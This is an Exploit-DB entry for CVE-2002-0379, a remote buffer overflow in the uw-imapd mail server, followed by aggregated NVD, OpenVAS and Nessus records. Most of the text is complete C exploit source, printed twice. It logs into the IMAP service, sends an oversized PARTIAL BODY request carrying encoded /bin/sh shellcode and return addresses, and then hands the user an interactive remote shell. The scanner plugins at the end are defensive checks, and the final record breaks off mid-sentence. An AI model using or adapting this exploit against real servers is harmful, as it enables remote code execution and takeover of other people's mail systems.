ID EDB-ID:21442
Type exploitdb
Reporter korty
Modified 2002-05-10T00:00:00
Description
Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1). CVE-2002-0379. Remote exploit for linux platform
source: http://www.securityfocus.com/bid/4713/info
Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.
This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.
/*
* http://www.freeweb.nu/mantra/05_2002/uw-imapd.html
*
* uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4
*
* Copyright (C) 2002 Christophe "korty" Bailleux <cb@t-online.fr>
* Copyright (C) 2002 Kostya Kortchinsky <kostya.kortchinsky@renater.fr>
*
* All Rights Reserved
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* Usage: ./wu-imap host user password shellcode_addressr alignement
*
* Demonstration values for Linux:
*
* (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0
* (Redhat 7.2) ./uw-imap localhost test test1234 0xbffff760 0
*
* THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
*
* The code is dirty...but we like dirty things :)
* And it works very well :)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#define GOOD_EXIT 0
#define ERROR_EXIT 1
#define DEFAULT_PROTOCOL 0
#define SEND_FLAGS 0
#define RECV_FLAGS 0
char sc[]=
"\xeb\x38" /* jmp 0x38 */
"\x5e" /* popl %esi */
"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x08" /* addl $0x8,%eax */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xc3\xff\xff\xff" /* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */
int imap_send(int s, char *buffer)
{
int result = GOOD_EXIT;
if (send(s, buffer, strlen(buffer), SEND_FLAGS) < 0)
result = ERROR_EXIT;
return result;
}
int imap_receive(int s, char *buffer, int size)
{
int result = GOOD_EXIT;
int char_recv;
int tot_recv = 0;
bzero(buffer, size);
do {
char_recv = recv(s, &buffer[tot_recv], size - tot_recv, RECV_FLAGS);
if (char_recv > 0)
tot_recv += char_recv;
} while ((char_recv > 0) && (strchr(buffer, 13) == NULL));
if (char_recv < 0)
result = ERROR_EXIT;
return result;
}
#define BANNER "pwd ; uname -a"
int interact( int fd )
{
fd_set fds;
ssize_t ssize;
char buffer[ 666 ];
write( fd, BANNER"\n", sizeof(BANNER) );
while ( 12 != 42 ) {
FD_ZERO( &fds );
FD_SET( STDIN_FILENO, &fds );
FD_SET( fd, &fds);
select( fd + 1, &fds, NULL, NULL, NULL );
if ( FD_ISSET(STDIN_FILENO, &fds) ) {
ssize = read( STDIN_FILENO, buffer, sizeof(buffer) );
if ( ssize < 0 ) {
return( -1 );
}
if ( ssize == 0 ) {
return( 0 );
}
write( fd, buffer, ssize );
}
if ( FD_ISSET(fd, &fds) ) {
ssize = read( fd, buffer, sizeof(buffer) );
if ( ssize < 0 ) {
return( -1 );
}
if ( ssize == 0 ) {
return( 0 );
}
write( STDOUT_FILENO, buffer, ssize );
}
}
return( -1 );
}
void usage(char *cmd)
{
printf("Usage: %s host user pass shellcode_addr align\n", cmd);
printf("Demo: %s localhost test test1234 0xbffffa40 0\n", cmd);
exit(0);
}
int main(int argc, char *argv[])
{
struct sockaddr_in server;
struct servent *sp;
struct hostent *hp;
int s, i , ret, align;
int blaw = 1024;
char *user, *passwd;
char imap_info[4096];
char imap_login[4096];
char imap_query[4096];
char buffer[2048];
int exit_code = GOOD_EXIT;
if (argc != 6) usage(argv[0]);
user = argv[2];
passwd = argv[3];
ret = strtoul(argv[4], NULL, 16);
align = atoi(argv[5]);
if ((hp = gethostbyname(argv[1])) == NULL)
exit_code = ERROR_EXIT;
if ((exit_code == GOOD_EXIT) && (sp = getservbyname("imap2", "tcp")) ==
NULL)
exit_code = ERROR_EXIT;
if (exit_code == GOOD_EXIT) {
if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0)
return exit_code = ERROR_EXIT;
bzero((char *) &server, sizeof(server));
bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length);
server.sin_family = hp->h_addrtype;
server.sin_port = sp->s_port;
if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0)
exit_code = ERROR_EXIT;
else {
printf(" [1;34mV�rification de la banni�re : [0m\n");
if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
if (strstr(imap_info, "IMAP4rev1 200") == NULL) {
printf(" [1;32mService IMAPd non reconnu ... [0m\n");
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_send(s, "x CAPABILITY\n")) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf(" [1;34mV�rification des options du service : [0m\n");
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
if (strstr(imap_info, " IMAP4 ") == NULL) {
printf(" [1;32mService IMAPd non vuln�rable ... [0m\n");
shutdown(s, 2);
close(s);
return exit_code;
}
printf(" [1;31mService IMAPd vuln�rable ... [0m\n");
sprintf(imap_login, "x LOGIN %s %s\n", user, passwd);
if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
if ((exit_code = imap_send(s, "x SELECT Inbox\n")) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
memset(buffer, 0x90, sizeof(buffer));
memcpy(buffer + 512, sc, strlen(sc));
for (i = blaw + align ; i < 1096; i +=4)
*(unsigned int *)(&buffer[i]) = ret;
*(unsigned int *)(&buffer[i + 1]) = 0;
sprintf(imap_query, "x PARTIAL 1 BODY[%s] 1 1\n", buffer);
if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_send(s, "x LOGOUT\n")) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
}
}
i = interact( s );
return exit_code;
}
{"id": "EDB-ID:21442", "hash": "c9d5a64ffdbc15de2eab9fa44d7826a9", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability 1", "description": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1). CVE-2002-0379. Remote exploit for linux platform", "published": "2002-05-10T00:00:00", "modified": "2002-05-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/21442/", "reporter": "korty", "references": [], "cvelist": ["CVE-2002-0379"], "lastseen": "2016-02-02T16:28:51", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0379"]}, {"type": "openvas", "idList": ["OPENVAS:53739"]}, {"type": "osvdb", "idList": ["OSVDB:790"]}, {"type": "exploitdb", "idList": ["EDB-ID:21443"]}, {"type": "nessus", "idList": ["IMAP_BODY_OVERFLOW.NASL", "MANDRAKE_MDKSA-2002-034.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-215-1:31563"]}], "modified": "2016-02-02T16:28:51"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/21442/", "sourceData": "source: http://www.securityfocus.com/bid/4713/info\r\n\r\nWu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.\r\n\r\nThis only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315. \r\n\r\n/*\r\n * http://www.freeweb.nu/mantra/05_2002/uw-imapd.html\r\n *\r\n * uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4\r\n *\r\n * Copyright (C) 2002 Christophe \"korty\" Bailleux <cb@t-online.fr>\r\n * Copyright (C) 2002 Kostya Kortchinsky <kostya.kortchinsky@renater.fr>\r\n *\r\n * All Rights Reserved\r\n * The copyright notice above does not evidence any\r\n * actual or intended publication of such source code.\r\n *\r\n * Usage: ./wu-imap host user password shellcode_addressr alignement\r\n *\r\n * Demonstration values for Linux:\r\n *\r\n * (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0\r\n * (Redhat 7.2) ./uw-imap localhost test test1234 0xbffff760 0\r\n *\r\n * THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER\r\n *\r\n * The code is dirty...but we like dirty things :)\r\n * And it works very well :)\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n\r\n#define GOOD_EXIT 0\r\n#define ERROR_EXIT 1\r\n\r\n#define DEFAULT_PROTOCOL 0\r\n#define SEND_FLAGS 0\r\n#define RECV_FLAGS 0\r\n\r\nchar sc[]=\r\n\"\\xeb\\x38\" /* jmp 0x38 */\r\n\"\\x5e\" /* popl %esi */\r\n\"\\x80\\x46\\x01\\x50\" /* addb $0x50,0x1(%esi) */\r\n\"\\x80\\x46\\x02\\x50\" /* addb $0x50,0x2(%esi) */\r\n\"\\x80\\x46\\x03\\x50\" /* addb $0x50,0x3(%esi) */\r\n\"\\x80\\x46\\x05\\x50\" /* addb $0x50,0x5(%esi) */\r\n\"\\x80\\x46\\x06\\x50\" /* addb $0x50,0x6(%esi) */\r\n\"\\x89\\xf0\" /* movl %esi,%eax */\r\n\"\\x83\\xc0\\x08\" /* addl $0x8,%eax */\r\n\"\\x89\\x46\\x08\" /* movl %eax,0x8(%esi) */\r\n\"\\x31\\xc0\" /* xorl %eax,%eax */\r\n\"\\x88\\x46\\x07\" /* movb %eax,0x7(%esi) */\r\n\"\\x89\\x46\\x0c\" /* movl %eax,0xc(%esi) */\r\n\"\\xb0\\x0b\" /* movb $0xb,%al */\r\n\"\\x89\\xf3\" /* movl %esi,%ebx */\r\n\"\\x8d\\x4e\\x08\" /* leal 0x8(%esi),%ecx */\r\n\"\\x8d\\x56\\x0c\" /* leal 0xc(%esi),%edx */\r\n\"\\xcd\\x80\" /* int $0x80 */\r\n\"\\x31\\xdb\" /* xorl %ebx,%ebx */\r\n\"\\x89\\xd8\" /* movl %ebx,%eax */\r\n\"\\x40\" /* inc %eax */\r\n\"\\xcd\\x80\" /* int $0x80 */\r\n\"\\xe8\\xc3\\xff\\xff\\xff\" /* call -0x3d */\r\n\"\\x2f\\x12\\x19\\x1e\\x2f\\x23\\x18\"; /* .string \"/bin/sh\" */\r\n\r\nint imap_send(int s, char *buffer)\r\n{\r\n int result = GOOD_EXIT;\r\n\r\n if (send(s, buffer, strlen(buffer), SEND_FLAGS) < 0)\r\n result = ERROR_EXIT;\r\n\r\n return result;\r\n}\r\n\r\nint imap_receive(int s, char *buffer, int size)\r\n{\r\n int result = GOOD_EXIT;\r\n int char_recv;\r\n int tot_recv = 0;\r\n\r\n bzero(buffer, size);\r\n do {\r\n char_recv = recv(s, &buffer[tot_recv], size - tot_recv, RECV_FLAGS);\r\n if (char_recv > 0)\r\n tot_recv += char_recv;\r\n } while ((char_recv > 0) && (strchr(buffer, 13) == NULL));\r\n\r\n if (char_recv < 0)\r\n result = ERROR_EXIT;\r\n\r\n return result;\r\n}\r\n\r\n#define BANNER \"pwd ; uname -a\"\r\n\r\nint interact( int fd )\r\n{\r\n fd_set fds;\r\n ssize_t ssize;\r\n char buffer[ 666 ];\r\n\r\n write( fd, BANNER\"\\n\", sizeof(BANNER) );\r\n while ( 12 != 42 ) {\r\n FD_ZERO( &fds );\r\n FD_SET( STDIN_FILENO, &fds );\r\n FD_SET( fd, &fds);\r\n select( fd + 1, &fds, NULL, NULL, NULL );\r\n\r\n if ( FD_ISSET(STDIN_FILENO, &fds) ) {\r\n ssize = read( STDIN_FILENO, buffer, sizeof(buffer) );\r\n if ( ssize < 0 ) {\r\n return( -1 );\r\n }\r\n if ( ssize == 0 ) {\r\n return( 0 );\r\n }\r\n\r\n write( fd, buffer, ssize );\r\n\r\n }\r\n\r\n if ( FD_ISSET(fd, &fds) ) {\r\n ssize = read( fd, buffer, sizeof(buffer) );\r\n if ( ssize < 0 ) {\r\n return( -1 );\r\n }\r\n if ( ssize == 0 ) {\r\n return( 0 );\r\n }\r\n\r\n write( STDOUT_FILENO, buffer, ssize );\r\n\r\n }\r\n }\r\n return( -1 );\r\n }\r\n\r\n\r\nvoid usage(char *cmd)\r\n{\r\n printf(\"Usage: %s host user pass shellcode_addr align\\n\", cmd);\r\n printf(\"Demo: %s localhost test test1234 0xbffffa40 0\\n\", cmd);\r\n exit(0);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct sockaddr_in server;\r\n struct servent *sp;\r\n struct hostent *hp;\r\n int s, i , ret, align;\r\n int blaw = 1024;\r\n char *user, *passwd;\r\n\r\n char imap_info[4096];\r\n char imap_login[4096];\r\n char imap_query[4096];\r\n char buffer[2048];\r\n\r\n int exit_code = GOOD_EXIT;\r\n\r\n if (argc != 6) usage(argv[0]);\r\n\r\n user = argv[2];\r\n passwd = argv[3];\r\n ret = strtoul(argv[4], NULL, 16);\r\n align = atoi(argv[5]);\r\n\r\n if ((hp = gethostbyname(argv[1])) == NULL)\r\n exit_code = ERROR_EXIT;\r\n\r\n if ((exit_code == GOOD_EXIT) && (sp = getservbyname(\"imap2\", \"tcp\")) ==\r\nNULL)\r\n exit_code = ERROR_EXIT;\r\n\r\n if (exit_code == GOOD_EXIT) {\r\n if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0)\r\n return exit_code = ERROR_EXIT;\r\n\r\n bzero((char *) &server, sizeof(server));\r\n bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length);\r\n server.sin_family = hp->h_addrtype;\r\n server.sin_port = sp->s_port;\r\n if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0)\r\n exit_code = ERROR_EXIT;\r\n else {\r\n printf(\" [1;34mV\ufffdrification de la banni\ufffdre : [0m\\n\");\r\n if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\"%s\", imap_info);\r\n if (strstr(imap_info, \"IMAP4rev1 200\") == NULL) {\r\n printf(\" [1;32mService IMAPd non reconnu ... [0m\\n\");\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_send(s, \"x CAPABILITY\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\" [1;34mV\ufffdrification des options du service : [0m\\n\");\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\"%s\", imap_info);\r\n if (strstr(imap_info, \" IMAP4 \") == NULL) {\r\n printf(\" [1;32mService IMAPd non vuln\ufffdrable ... [0m\\n\");\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\" [1;31mService IMAPd vuln\ufffdrable ... [0m\\n\");\r\n sprintf(imap_login, \"x LOGIN %s %s\\n\", user, passwd);\r\n if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n printf(\"%s\", imap_info);\r\n\r\n if ((exit_code = imap_send(s, \"x SELECT Inbox\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n printf(\"%s\", imap_info);\r\n\r\n memset(buffer, 0x90, sizeof(buffer));\r\n memcpy(buffer + 512, sc, strlen(sc));\r\n\r\n for (i = blaw + align ; i < 1096; i +=4)\r\n *(unsigned int *)(&buffer[i]) = ret;\r\n\r\n *(unsigned int *)(&buffer[i + 1]) = 0;\r\n\r\n sprintf(imap_query, \"x PARTIAL 1 BODY[%s] 1 1\\n\", buffer);\r\n if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_send(s, \"x LOGOUT\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n }\r\n }\r\n\r\n i = interact( s );\r\n\r\n return exit_code;\r\n}\r\n", "osvdbidlist": ["790"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-10T10:34:48", "bulletinFamily": "NVD", "description": "Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.", "modified": "2017-10-09T21:30:06", "published": "2002-06-25T00:00:00", "id": "CVE-2002-0379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0379", "title": "CVE-2002-0379", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cyrus-imapd\nannounced via advisory DSA 215-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53739", "id": "OPENVAS:53739", "title": "Debian Security Advisory DSA 215-1 (cyrus-imapd)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_215_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 215-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Timo Sirainen discovered a buffer overflow in the Cyrus IMAP server,\nwhich could be exploited by a remote attacker prior to logging in. A\nmalicious user could craft a request to run commands on the server under\nthe UID and GID of the cyrus server.\n\nFor the current stable distribution (woody) this problem has been\nfixed in version 1.5.19-9.1.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 1.5.19-2.2.\n\nFor the current unstable distribution (sid) this problem has been\nfixed in version 1.5.19-9.10. The cyrus21-imapd packages are not\nvulnerable\n\nWe recommend that you upgrade your cyrus-imapd package.\";\ntag_summary = \"The remote host is missing an update to cyrus-imapd\nannounced via advisory DSA 215-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20215-1\";\n\nif(description)\n{\n script_id(53739);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0379\");\n script_bugtraq_id(4713);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 215-1 (cyrus-imapd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cyrus-admin\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-common\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-dev\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-imapd\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-nntp\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-pop3d\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-admin\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-common\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-dev\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-imapd\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-nntp\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-pop3d\", ver:\"1.5.19-9.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:05:15", "bulletinFamily": "scanner", "description": "The remote version of UW-IMAP is vulnerable to a buffer overflow condition \nthat could allow an authenticated attacker to execute arbitrary code on the \nremote host with the privileges of the IMAP server.", "modified": "2018-07-12T00:00:00", "published": "2002-05-29T00:00:00", "id": "IMAP_BODY_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10966", "title": "University of Washington imap Server (uw-imapd) BODY Request Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10966);\n script_version (\"1.22\");\n script_cve_id(\"CVE-2002-0379\");\n script_bugtraq_id(4713);\n \n script_name(english:\"University of Washington imap Server (uw-imapd) BODY Request Remote Overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to execute arbitrary code on the remote host, through the \nIMAP server.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of UW-IMAP is vulnerable to a buffer overflow condition \nthat could allow an authenticated attacker to execute arbitrary code on the \nremote host with the privileges of the IMAP server.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to imap-2001a.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/05/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/05/10\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.283\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.284\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.287\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:university_of_washington:uw-imap:2000.315\");\nscript_end_attributes();\n\n \n script_summary(english:\"checks for a buffer overflow in imapd\");\n script_category(ACT_GATHER_INFO);\n # can be changed to MIXED when real attack tried.\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n script_dependencie(\"find_service1.nasl\", \"logins.nasl\");\n script_require_ports(\"Services/imap\", 143);\n script_exclude_keys(\"imap/false_imap\");\n exit(0);\n}\n\n#\n\ninclude(\"imap_func.inc\");\n\nport = get_kb_item(\"Services/imap\");\nif(!port)port = 143;\nif(!get_port_state(port))exit(0);\nbanner = get_imap_banner(port:port);\nif ( ! banner || !ereg(pattern:\"OK .* IMAP4rev1 *200[01]\\.[0-9][^ ]* at\", string:banner))exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\n\nr = recv_line(socket:soc, length:4096);\n\nsend(socket:soc, data:string(\"x capability\\r\\n\"));\nr = recv_line(socket:soc, length:4096);\n\n# According to the UW guys, if the server replies with IMAP4 and IMAP4REV1\n# then it's vulnerable to the overflow.\nif(\"CAPABILITY IMAP4 IMAP4REV1\" >< r ) security_warning(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:05:31", "bulletinFamily": "scanner", "description": "A buffer overflow was discovered in the imap server that could allow a\nmalicious user to run code on the server with the uid and gid of the\nemail owner by constructing a malformed request that would trigger the\nbuffer overflow. However, the user must successfully authenticate to\nthe imap service in order to exploit it, 